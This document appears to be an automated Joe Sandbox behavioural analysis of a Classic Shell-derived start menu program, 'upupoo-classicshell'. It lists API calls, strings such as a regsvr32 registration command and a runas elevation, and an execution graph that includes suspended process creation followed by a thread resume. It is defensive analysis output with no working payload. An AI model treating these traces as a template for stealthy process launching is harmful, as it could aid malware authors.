Total number of Limit Nodes: 34
                                                                                                              execution_graph 27974 10003c21 27975 10003c2c 27974->27975 27976 10003c5f dllmain_crt_process_detach 27974->27976 27977 10003c51 dllmain_crt_process_attach 27975->27977 27978 10003c31 27975->27978 27983 10003c3b 27976->27983 27977->27983 27979 10003c36 27978->27979 27980 10003c47 27978->27980 27979->27983 27984 10004236 27 API calls 27979->27984 27985 10004217 31 API calls 27980->27985 27984->27983 27985->27983 27986 c25743 28032 c26684 27986->28032 27988 c2574f GetStartupInfoW 27990 c25772 27988->27990 28033 c28e0c HeapCreate 27990->28033 27992 c257c2 28180 c2777c 78 API calls 7 library calls 27992->28180 27995 c257c8 27996 c257d4 __RTC_Initialize 27995->27996 27997 c257cc 27995->27997 28035 c2a6d8 72 API calls 3 library calls 27996->28035 28181 c2571a 67 API calls 3 library calls 27997->28181 27999 c257d3 27999->27996 28001 c257e1 28002 c257e5 28001->28002 28003 c257ed GetCommandLineW 28001->28003 28182 c29adf 67 API calls 3 library calls 28002->28182 28036 c2a67b 69 API calls 2 library calls 28003->28036 28006 c257ec 28006->28003 28007 c257fc 28183 c2a5cd 68 API calls 2 library calls 28007->28183 28009 c25806 28010 c25812 28009->28010 28011 c2580a 28009->28011 28037 c2a39e 67 API calls 5 library calls 28010->28037 28184 c29adf 67 API calls 3 library calls 28011->28184 28014 c25811 28014->28010 28015 c25817 28016 c25823 28015->28016 28017 c2581b 28015->28017 28038 c29b9e 74 API calls 5 library calls 28016->28038 28185 c29adf 67 API calls 3 library calls 28017->28185 28020 c25822 28020->28016 28021 c25829 28022 c2582e 28021->28022 28025 c25835 __wwincmdln 28021->28025 28186 c29adf 67 API calls 3 library calls 28022->28186 28024 c25834 28024->28025 28025->28024 28039 c21ce0 28025->28039 28028 c25863 28188 c29d7b 67 API calls _doexit 28028->28188 28031 c25868 __calloc_impl 28032->27988 28034 c257b6 28033->28034 28034->27992 28179 c2571a 67 API calls 3 
library calls 28034->28179 28035->28001 28036->28007 28037->28015 28038->28021 28189 c25670 28039->28189 28043 c21f10 ?WaitDllInitThread@ ?DllGetSettingBool@@YA_NPB_W 28044 c21f28 ?DllLogToFile@ 28043->28044 28045 c21f3c ?DllGetSettingInt@@YAHPB_W 28043->28045 28046 c22214 28044->28046 28047 c21f55 28045->28047 28048 c21f4e Sleep 28045->28048 28212 c24f90 5 API calls __invoke_watson 28046->28212 28053 c2221b 28047->28053 28054 c21f6b ?WaitDllInitThread@ 28047->28054 28048->28047 28049 c21d70 28049->28047 28056 c21d86 ?WaitDllInitThread@ 28049->28056 28050 c21d2c 28050->28043 28050->28049 28052 c22af4 28052->28028 28187 c29d4f 67 API calls _doexit 28052->28187 28060 c22235 ?WaitDllInitThread@ CoInitialize 28053->28060 28061 c222ba 28053->28061 28196 c21290 RegOpenKeyExW RegCloseKey 28054->28196 28194 c21290 RegOpenKeyExW RegCloseKey 28056->28194 28057 c21f93 28062 c220d7 28057->28062 28063 c21f9f RegSetValueExW 28057->28063 28059 c21dae 28064 c21ea9 ?DllGetSettingBool@@YA_NPB_W 28059->28064 28195 c212f0 RegQueryValueExW 28059->28195 28201 c242a0 _memcpy_s _wcschr 28060->28201 28078 c223a2 GetModuleFileNameW PathFindFileNameW SetCurrentDirectoryW 28061->28078 28079 c222d2 ?WaitDllInitThread@ 28061->28079 28065 c220f6 ?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H 28062->28065 28197 c256a0 __VEC_memzero 28063->28197 28071 c21ee6 ?DllGetSettingInt@@YAHPB_W 28064->28071 28072 c21ebb ?DllLogToFile@ 28064->28072 28200 c24360 101 API calls __strftime_l 28065->28200 28068 c21ff0 DoEnvironmentSubstW 28198 c256a0 __VEC_memzero 28068->28198 28075 c21ef8 Sleep 28071->28075 28076 c21eff 28071->28076 28072->28046 28081 c21eda RegCloseKey 28072->28081 28073 c2225a ?DllExecuteNamedCommand@@YA_NPB_W 28082 c222af CoUninitialize 28073->28082 28083 c2226f PeekMessageW 28073->28083 28075->28076 28076->28047 28086 c21f07 RegCloseKey 28076->28086 28077 c21dc9 28077->28064 28092 c21ddb 
?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H ?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H MessageBoxW 28077->28092 28089 c223e2 28078->28089 28087 c222f0 28079->28087 28080 c22121 FormatMessageW ?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H MessageBoxW 28093 c221e5 28080->28093 28081->28046 28082->28046 28083->28082 28084 c22285 28083->28084 28090 c22291 TranslateMessage DispatchMessageW PeekMessageW 28084->28090 28085 c22031 DoEnvironmentSubstW 28199 c256a0 __VEC_memzero 28085->28199 28086->28047 28097 c222ff GetCurrentDirectoryW PathAppendW PathAddExtensionW LoadLibraryExW 28087->28097 28098 c2234c ?DllLoadTranslationResources@@YAXPAUHINSTANCE__@@PAH ?DllSaveAdmx@@YA_NW4TSettingsComponent@@PBD11 28087->28098 28094 c224bb ?WaitDllInitThread@ 28089->28094 28095 c223ef CoInitialize SHEvaluateSystemCommandTemplate 28089->28095 28090->28082 28090->28090 28107 c21e0f _memset 28092->28107 28093->28046 28102 c2220d RegCloseKey 28093->28102 28114 c224cf 28094->28114 28099 c22437 28095->28099 28110 c22417 _memset 28095->28110 28096 c2205f CreateProcessW 28100 c220e1 GetLastError 28096->28100 28101 c220a4 CloseHandle WaitForSingleObject GetExitCodeProcess CloseHandle 28096->28101 28097->28098 28098->28046 28103 c2237e ?DllSaveAdmx@@YA_NW4TSettingsComponent@@PBD11 28098->28103 28202 c22be0 7 API calls 3 library calls 28099->28202 28105 c220eb 28100->28105 28101->28105 28102->28046 28103->28046 28105->28065 28106 c22196 ?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H ?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H MessageBoxW 28105->28106 28108 c221d7 28106->28108 28109 c21e3f DoEnvironmentSubstW GetFileAttributesW 28107->28109 28108->28093 28109->28064 28111 c21e68 GetModuleFileNameW CoInitialize ShellExecuteW CoUninitialize 28109->28111 28113 c2249e 
CoUninitialize 28110->28113 28111->28064 28112 c225ad 28117 c225c4 28112->28117 28125 c2260e 28112->28125 28203 c213d0 CoTaskMemFree 28113->28203 28114->28112 28116 c22582 CoInitialize ?DllImportSettingsXml@@YA_NPB_W CoUninitialize 28114->28116 28116->28046 28116->28112 28120 c225df CoInitialize ?DllExportSettingsXml@@YA_NPB_W CoUninitialize 28117->28120 28118 c224ad 28204 c213d0 CoTaskMemFree 28118->28204 28120->28046 28121 c22661 SetUnhandledExceptionFilter 28122 c2266e GetUserNameW GetCurrentThreadId GetThreadDesktop GetUserObjectInformationW 28121->28122 28205 c25598 67 API calls 4 library calls 28122->28205 28124 c226be GetUserObjectInformationW 28206 c24efd 79 API calls 2 library calls 28124->28206 28125->28121 28125->28122 28127 c226de 28207 c24360 101 API calls __strftime_l 28127->28207 28129 c22705 28208 c254bb 67 API calls 7 library calls 28129->28208 28131 c2270b 28132 c22713 ?DllLogToFile@ 28131->28132 28133 c2272e FindWindowExW 28131->28133 28132->28133 28134 c22753 28133->28134 28135 c22747 GetWindowThreadProcessId 28133->28135 28136 c22763 CreateMutexW GetLastError 28134->28136 28137 c22885 28134->28137 28135->28134 28140 c22793 28136->28140 28141 c22788 GetLastError 28136->28141 28138 c2288e GetDesktopWindow FindWindowExW RegisterWindowMessageW PostMessageW 28137->28138 28139 c228bd 28137->28139 28138->28046 28143 c228e5 OleInitialize 28139->28143 28154 c228d1 28139->28154 28142 c227cf 28140->28142 28144 c2279c 28140->28144 28141->28137 28141->28140 28145 c22833 28142->28145 28146 c227d3 AllowSetForegroundWindow ?FindTaskBar@@YAPAUHWND__@@K 28142->28146 28147 c22906 28143->28147 28148 c228f5 ?DllUpdateSettings@ ?InitManagers@@YAX_N 28143->28148 28144->28145 28149 c227a5 AllowSetForegroundWindow FindWindowW 28144->28149 28152 c22864 28145->28152 28153 c22838 28145->28153 28150 c227f2 RegisterWindowMessageW 28146->28150 28151 c227c4 28146->28151 28209 c21c50 137 API calls 28147->28209 28148->28147 28149->28145 28149->28151 28155 c2282d PostMessageW 
28150->28155 28151->28155 28152->28046 28157 c2286d ?DllLogToFile@ 28152->28157 28153->28046 28156 c22844 WaitForSingleObject 28153->28156 28154->28046 28158 c228d9 ReleaseMutex 28154->28158 28155->28145 28156->28046 28159 c22858 ReleaseMutex 28156->28159 28157->28046 28158->28046 28159->28046 28161 c22942 RegisterWindowMessageW GetModuleHandleW GetProcAddress 28162 c229af ChangeWindowMessageFilter ChangeWindowMessageFilter ChangeWindowMessageFilter ChangeWindowMessageFilter 28161->28162 28163 c2296f 28161->28163 28162->28163 28210 c21000 103 API calls 2 library calls 28163->28210 28165 c229fb 28166 c22a90 ?DllLogToFile@ DestroyWindow 28165->28166 28169 c22a21 ?DllLogToFile@ 28165->28169 28170 c22a0e PostMessageW 28165->28170 28167 c22ab2 ?CloseManagers@@YAX_N 28166->28167 28168 c22abd OleUninitialize 28166->28168 28167->28168 28172 c22ad2 28168->28172 28173 c22acb ReleaseMutex 28168->28173 28171 c22a50 28169->28171 28170->28169 28174 c22a57 IsWindow 28171->28174 28175 c22a5e GetMessageW 28171->28175 28172->28046 28211 c2478c GetProcessHeap HeapFree 28172->28211 28173->28172 28174->28175 28176 c22a8c 28174->28176 28175->28176 28177 c22a76 TranslateMessage DispatchMessageW 28175->28177 28176->28166 28177->28171 28179->27992 28180->27995 28181->27999 28182->28006 28183->28009 28184->28014 28185->28020 28186->28024 28187->28028 28188->28031 28190 c21cea ?DllLogToFile@ GetModuleHandleW 28189->28190 28191 c22b50 FindResourceW 28190->28191 28192 c22b68 LoadResource LockResource 28191->28192 28193 c22b64 28191->28193 28192->28193 28193->28050 28194->28059 28195->28077 28196->28057 28197->28068 28198->28085 28199->28096 28200->28080 28201->28073 28202->28110 28203->28118 28204->28046 28205->28124 28206->28127 28207->28129 28208->28131 28209->28161 28210->28165 28211->28046 28212->28052 28213 6e09b8c8 28222 6e0a8c17 28213->28222 28218 6e0a97f9 81 API calls 28219 6e09b8e0 28218->28219 28235 6e09cc60 52 API calls ___scrt_initialize_default_local_stdio_options 28219->28235 
28221 6e09b8fa 28225 6e0a932b __ExceptionPtr::__ExceptionPtr 28222->28225 28223 6e09b8cf 28228 6e0a97f9 28223->28228 28225->28223 28236 6e0b0b6f 7 API calls 2 library calls 28225->28236 28237 6e0a95dc RaiseException __CxxThrowException@8 new 28225->28237 28238 6e0a95bf RaiseException __CxxThrowException@8 __ExceptionPtr::__ExceptionPtr 28225->28238 28239 6e0b0da4 28228->28239 28230 6e0a9806 28231 6e09b8d9 28230->28231 28232 6e0a9812 28230->28232 28231->28218 28253 6e0a9cef 27 API calls 2 library calls 28232->28253 28235->28221 28236->28225 28237->28225 28240 6e0b0db0 28239->28240 28241 6e0b0dc5 28239->28241 28263 6e0b1251 20 API calls _abort 28240->28263 28254 6e0b31be 28241->28254 28244 6e0b0db5 28264 6e0b1195 26 API calls ___std_exception_copy 28244->28264 28247 6e0b0de8 28247->28230 28248 6e0b0dc0 28248->28230 28250 6e0b0dd9 28266 6e0b1251 20 API calls _abort 28250->28266 28252 6e0b0de4 28252->28230 28267 6e0b2e03 28254->28267 28257 6e0b320f 28274 6e0b0c15 28257->28274 28258 6e0b31ee 28295 6e0a8161 28258->28295 28262 6e0b0dd0 28262->28247 28265 6e0b1251 20 API calls _abort 28262->28265 28263->28244 28264->28248 28265->28250 28266->28252 28268 6e0b2e33 28267->28268 28271 6e0b2e2f 28267->28271 28268->28257 28268->28258 28269 6e0b2e53 28269->28268 28272 6e0b2e5f GetProcAddress 28269->28272 28271->28268 28271->28269 28302 6e0b2e9f LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 28271->28302 28273 6e0b2e6f __crt_fast_encode_pointer 28272->28273 28273->28268 28303 6e0b3da5 28274->28303 28277 6e0b0c25 28279 6e0b0c2f IsProcessorFeaturePresent 28277->28279 28280 6e0b0c4d 28277->28280 28281 6e0b0c3a 28279->28281 28306 6e0b0384 28280->28306 28317 6e0b0fcb 8 API calls 3 library calls 28281->28317 28296 6e0a816a 28295->28296 28297 6e0a816c IsProcessorFeaturePresent 28295->28297 28296->28262 28299 6e0a8c61 28297->28299 28370 6e0a8c25 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 28299->28370 28301 6e0a8d44 28301->28262 
28302->28271 28321 6e0b3d13 28303->28321 28335 6e0b015e 28306->28335 28316 6e0b3e00 39 API calls 3 library calls 28316->28277 28317->28280 28324 6e0b3cb9 28321->28324 28323 6e0b0c1a 28323->28277 28323->28316 28325 6e0b3cc5 ___DestructExceptionObject 28324->28325 28330 6e0b0ec4 EnterCriticalSection 28325->28330 28327 6e0b3cd3 28331 6e0b3d07 28327->28331 28329 6e0b3cfa ___DestructExceptionObject 28329->28323 28330->28327 28334 6e0b0f0c LeaveCriticalSection 28331->28334 28333 6e0b3d11 28333->28329 28334->28333 28336 6e0b016a _abort 28335->28336 28337 6e0b0183 28336->28337 28338 6e0b0171 28336->28338 28361 6e0b0ec4 EnterCriticalSection 28337->28361 28359 6e0b02b8 GetModuleHandleW 28338->28359 28341 6e0b0176 28341->28337 28360 6e0b02fc 8 API calls TranslatorGuardHandler 28341->28360 28342 6e0b0228 28365 6e0b0268 LeaveCriticalSection _abort 28342->28365 28345 6e0b01ff 28351 6e0b0217 28345->28351 28363 6e0aff17 5 API calls TranslatorGuardHandler 28345->28363 28346 6e0b0182 28346->28337 28347 6e0b0241 28349 6e0b0271 28347->28349 28350 6e0b0245 28347->28350 28348 6e0b018a 28348->28342 28348->28345 28362 6e0b0933 20 API calls _abort 28348->28362 28367 6e0b93b9 5 API calls TranslatorGuardHandler 28349->28367 28366 6e0b0277 17 API calls _abort 28350->28366 28364 6e0aff17 5 API calls TranslatorGuardHandler 28351->28364 28359->28341 28360->28346 28361->28348 28362->28345 28363->28351 28364->28342 28365->28347 28370->28301 28371 6e0a1de0 28374 10003f36 28371->28374 28375 10003f44 28374->28375 28376 10003f3f 28374->28376 28380 10003e03 28375->28380 28397 10004498 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 28376->28397 28379 10003f52 28381 10003e0f ___DestructExceptionObject 28380->28381 28382 10003e25 dllmain_raw 28381->28382 28385 10003e20 28381->28385 28383 10003e3f dllmain_crt_dispatch 28382->28383 28384 10003efa ___DestructExceptionObject 28382->28384 28383->28384 28383->28385 28384->28379 28389 10003e61 28385->28389 28419 10005e54 
12 API calls 2 library calls 28385->28419 28398 10001270 28389->28398 28390 10003e98 28391 10003eab 28390->28391 28420 10005ef0 12 API calls 2 library calls 28390->28420 28391->28384 28394 10003eb5 dllmain_crt_dispatch 28391->28394 28392 10001270 __DllMainCRTStartup@12 44 API calls 28395 10003e84 dllmain_crt_dispatch dllmain_raw 28392->28395 28394->28384 28396 10003ec8 dllmain_raw 28394->28396 28395->28390 28396->28384 28397->28375 28399 1000128b __DllMainCRTStartup@12 28398->28399 28400 10002bd7 28399->28400 28421 10002c90 28399->28421 28459 10003ae3 28400->28459 28402 10002bf4 28402->28390 28402->28392 28404 10002abf 28404->28400 28436 10002c00 RegOpenKeyExW 28404->28436 28406 10002acc 28443 10002f00 28406->28443 28408 10002af1 28409 10002f00 __DllMainCRTStartup@12 27 API calls 28408->28409 28410 10002b08 28409->28410 28411 10002f00 __DllMainCRTStartup@12 27 API calls 28410->28411 28412 10002b1c 28411->28412 28450 10003660 28412->28450 28414 10002bcc 28458 10002f60 27 API calls __DllMainCRTStartup@12 28414->28458 28416 10002b9c GetFileAttributesW 28417 10002b60 __DllMainCRTStartup@12 28416->28417 28417->28414 28417->28416 28418 10002bc1 SetFileAttributesW 28417->28418 28418->28417 28419->28389 28420->28391 28422 10002c9d __DllMainCRTStartup@12 ___scrt_fastfail 28421->28422 28423 10002cb7 CreateProcessA 28422->28423 28424 10002cf0 28423->28424 28426 10002cff 28423->28426 28425 10003ae3 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28424->28425 28427 10002cfb 28425->28427 28466 10002dc0 28426->28466 28427->28404 28429 10002d5a 28430 10002d85 ResumeThread CloseHandle CloseHandle 28429->28430 28431 10002d65 CloseHandle CloseHandle 28429->28431 28433 10003ae3 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28430->28433 28432 10003ae3 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28431->28432 28434 10002d81 28432->28434 28435 10002dad 28433->28435 28434->28404 28435->28404 28437 10002c3f lstrlenW RegSetValueExW RegCloseKey 28436->28437 28438 
APIs
• ?DllLogToFile@@YAXPB_W0ZZ.CLASSICSTARTMENUDLL(Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt,StartMenu: start '%s',?), ref: 00C21D14
• GetModuleHandleW.KERNEL32(user32.dll,00000000), ref: 00C21D20
  • Part of subcall function 00C22B50: FindResourceW.KERNEL32(00C21D2C,00000001,00000010,6E0A7360,00C21D2C,00000000), ref: 00C22B5A
• ?WaitDllInitThread@@YAXXZ.CLASSICSTARTMENUDLL ref: 00C21D86
• ?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z.CLASSICSTARTMENUDLL(?,00000BB9,80000002,Software\UpupooClassic\ClassicShell,00020119), ref: 00C21DE5
• ?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z.CLASSICSTARTMENUDLL(?,00000DF7), ref: 00C21DF3
• MessageBoxW.USER32(00000000,?,6E0A7360,00000000), ref: 00C21E00
• _memset.LIBCMT ref: 00C21E3A
• DoEnvironmentSubstW.SHELL32(?,00000104), ref: 00C21E4F
• GetFileAttributesW.KERNEL32(?), ref: 00C21E5D
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00C21E77
• CoInitialize.OLE32(00000000), ref: 00C21E7F
• ShellExecuteW.SHELL32(00000000,runas,?,-upgrade,00000000,00000001), ref: 00C21E9D
• CoUninitialize.OLE32 ref: 00C21EA3
• ?DllGetSettingBool@@YA_NPB_W@Z.CLASSICSTARTMENUDLL(AutoStart,80000002,Software\UpupooClassic\ClassicShell,00020119), ref: 00C21EAE
• ?DllLogToFile@@YAXPB_W0ZZ.CLASSICSTARTMENUDLL(Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt,StartMenu: quit - no AutoStart), ref: 00C21EC5
• RegCloseKey.ADVAPI32(?), ref: 00C21EDB
• ?DllGetSettingInt@@YAHPB_W@Z.CLASSICSTARTMENUDLL(AutoStartDelay), ref: 00C21EEB
• Sleep.KERNEL32(00000000), ref: 00C21EF9
• RegCloseKey.ADVAPI32(?), ref: 00C21F08
• ?WaitDllInitThread@@YAXXZ.CLASSICSTARTMENUDLL ref: 00C21F10
• ?DllGetSettingBool@@YA_NPB_W@Z.CLASSICSTARTMENUDLL(AutoStart), ref: 00C21F1B
• ?DllLogToFile@@YAXPB_W0ZZ.CLASSICSTARTMENUDLL(Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt,StartMenu: quit - no AutoStart), ref: 00C21F32
• ?DllGetSettingInt@@YAHPB_W@Z.CLASSICSTARTMENUDLL(AutoStartDelay), ref: 00C21F41
• Sleep.KERNEL32(00000000), ref: 00C21F4F
• ?WaitDllInitThread@@YAXXZ.CLASSICSTARTMENUDLL ref: 00C21F6B
• RegSetValueExW.ADVAPI32 ref: 00C21FC3
• _memset.LIBCMT ref: 00C21FEB
• DoEnvironmentSubstW.SHELL32(?,00000104), ref: 00C22006
• _memset.LIBCMT ref: 00C2202C
• DoEnvironmentSubstW.SHELL32(?,00000104), ref: 00C22041
• _memset.LIBCMT ref: 00C2205A
• CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000040), ref: 00C2209A
• CloseHandle.KERNEL32(?), ref: 00C220AF
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C220B8
• GetExitCodeProcess.KERNEL32(?,?), ref: 00C220C8
• CloseHandle.KERNEL32(?), ref: 00C220D3
• ?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z.CLASSICSTARTMENUDLL(?,00000DF8), ref: 00C22100
• FormatMessageW.KERNEL32(00001200,00000000,?,00000000,?,00000400,00000000,?,?,?,?,80000002,Software\UpupooClassic\ClassicShell,00020106), ref: 00C22166
• ?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z.CLASSICSTARTMENUDLL(?,00000BB9,?,?,?,?,80000002,Software\UpupooClassic\ClassicShell,00020106), ref: 00C22176
• MessageBoxW.USER32(00000000,?,?,00000010), ref: 00C2218A
• ?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z.CLASSICSTARTMENUDLL(?,00000BB9), ref: 00C221A0
• ?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z.CLASSICSTARTMENUDLL(?,00000DF9), ref: 00C221AE
• MessageBoxW.USER32(00000000,?,%windir%\System32\regsvr32.exe,00000040), ref: 00C221BB
• RegCloseKey.ADVAPI32(?,?,00000010,?,?,?,?,?,?,80000002,Software\UpupooClassic\ClassicShell,00020106), ref: 00C2220E
• ?WaitDllInitThread@@YAXXZ.CLASSICSTARTMENUDLL ref: 00C22235
• CoInitialize.OLE32(00000000), ref: 00C2223C
• ?DllExecuteNamedCommand@@YA_NPB_W@Z.CLASSICSTARTMENUDLL(?,-0000000A,?,00000064,00C33B44), ref: 00C22262
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C2227F
• TranslateMessage.USER32(?), ref: 00C22296
• DispatchMessageW.USER32(?), ref: 00C2229D
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C222A9
• CoUninitialize.OLE32 ref: 00C222AF
• GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00C2230C
• PathAppendW.SHLWAPI(?,?), ref: 00C22322
• PathAddExtensionW.SHLWAPI(?,.dll), ref: 00C22335
• LoadLibraryExW.KERNEL32(?,00000000,00000022), ref: 00C22346
• ?DllLoadTranslationResources@@YAXPAUHINSTANCE__@@PAH@Z.CLASSICSTARTMENUDLL(00000000,00000000), ref: 00C2234E
• ?DllSaveAdmx@@YA_NW4TSettingsComponent@@PBD11@Z.CLASSICSTARTMENUDLL(00000001,ClassicStartMenu.admx,ClassicStartMenu.adml,ClassicStartMenuADMX.txt), ref: 00C2236B
• ?DllSaveAdmx@@YA_NW4TSettingsComponent@@PBD11@Z.CLASSICSTARTMENUDLL(00000004,ClassicShell.admx,ClassicShell.adml,ClassicShellADMX.txt), ref: 00C2238F
• ?WaitDllInitThread@@YAXXZ.CLASSICSTARTMENUDLL ref: 00C222D2
  • Part of subcall function 00C242A0: _wcschr.LIBCMT ref: 00C242B6
  • Part of subcall function 00C242A0: _wcschr.LIBCMT ref: 00C242DF
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00C223B0
• PathFindFileNameW.SHLWAPI(?), ref: 00C223BE
• SetCurrentDirectoryW.KERNEL32(?), ref: 00C223D1
• CoInitialize.OLE32(00000000), ref: 00C223F3
• SHEvaluateSystemCommandTemplate.SHELL32(-0000000E,?,00000000,?), ref: 00C2240D
• _memset.LIBCMT ref: 00C2246B
• ShellExecuteExW.SHELL32 ref: 00C22498
• CoUninitialize.OLE32 ref: 00C2249E
Strings
Memory Dump Source
• Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
Similarity
• API ID: L@@@String$LoadMessage$Ex@@TraitTraitsWait$CloseInitThread@@_memset$FileSetting$EnvironmentExecuteFile@@HandleInitializeModuleNamePathSubstUninitialize$Admx@@Bool@@Component@@CurrentD11@DirectoryFindInt@@PeekProcessSaveSettingsShellSleep_wcschr$AppendAttributesCodeCommandCommand@@CreateDispatchE__@@EvaluateExitExtensionFormatLibraryNamedObjectResourceResources@@SingleSystemTemplateTranslateTranslationValue
• String ID: $%s%s$%windir%\System32\StartMenuHelper32.dll$%windir%\System32\regsvr32.exe$-autorun$-backup $-cmd $-exit$-nohook$-open$-reloadsettings$-runas$-saveadmx $-settings$-startup$-toggle$-togglenew$-upgrade$-xml $.dll$<$AutoStart$AutoStartDelay$ChangeWindowMessageFilterEx$ClassicShell.adml$ClassicShell.admx$ClassicShellADMX.txt$ClassicStartMenu.CStartHookWindow$ClassicStartMenu.Mutex.%s.%s$ClassicStartMenu.StartMenuMsg$ClassicStartMenu.adml$ClassicStartMenu.admx$ClassicStartMenuADMX.txt$Default$PDGu$Progman$Shell_TrayWnd$Software\UpupooClassic\ClassicShell$Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt$StartHookWindow$StartMenu: end message loop$StartMenu: exit (mutex exists)$StartMenu: mutex %s$StartMenu: quit - no AutoStart$StartMenu: start '%s'$StartMenu: start message loop$TaskbarCreated$Tsn$WinVersion$regsvr32 /s "%windir%\System32\StartMenuHelper32.dll"$runas$user32.dll
• API String ID: 1283653776-1899632792
• Opcode ID: df57b9e7ebdffe23ef71a33d1d889cc6eb3df0fce48b82a89558d96f11db8e50
• Instruction ID: 2573635bffa96d83d6d79540cff73fb455827e508053473a4f11a810b7e00150
• Opcode Fuzzy Hash: df57b9e7ebdffe23ef71a33d1d889cc6eb3df0fce48b82a89558d96f11db8e50
• Instruction Fuzzy Hash: 2E721471654390BBD320DB64EC4AF9F77A8AF84B01F044918FA45A71D1DBB5EB04CBA2

Control-flow Graph

APIs
• std::_Xinvalid_argument.LIBCPMT ref: 6E0A9817
• GetModuleHandleW.KERNEL32(kernel32.dll,?,invalid random_device value), ref: 6E0A9823
• GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6E0A9831
• GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6E0A9848
• GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6E0A985F
• GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6E0A9876
• GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 6E0A988D
• GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 6E0A98A4
• GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 6E0A98BB
• GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 6E0A98D2
• GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 6E0A98E9
• GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 6E0A9900
• GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 6E0A9917
• GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 6E0A992E
• GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 6E0A9945
• GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 6E0A995C
• GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 6E0A9973
• GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 6E0A998A
• GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 6E0A99A1
• GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 6E0A99B8
• GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 6E0A99CF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
• Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmp
